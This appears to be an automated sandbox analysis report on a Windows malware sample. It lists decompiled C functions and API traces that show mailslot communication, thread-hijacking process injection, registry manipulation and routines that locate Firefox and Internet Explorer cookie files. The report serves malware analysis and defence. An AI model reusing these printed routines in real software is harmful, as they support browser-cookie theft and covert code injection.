  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32 ref: 0040170D
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95sleepfile
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 60d4fe491098cd8b8ea8b2edc024baa0d2d95a9826389b7bc5e65ecf9349917b
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: D8F02E85425EC28BC77E20442911BA16086B782F42C6CC3B29ED23829B4F41710B0B46
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B322D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CD171, Relevance: 9.1, APIs: 6, Instructions: 67 Total matches: 31thread
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Function 001C1C50, Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 158 Total matches: 59memorystringfile
Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
